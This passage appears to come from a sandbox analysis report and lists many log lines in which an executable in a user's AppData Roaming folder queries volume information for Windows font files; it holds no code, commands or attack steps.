                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
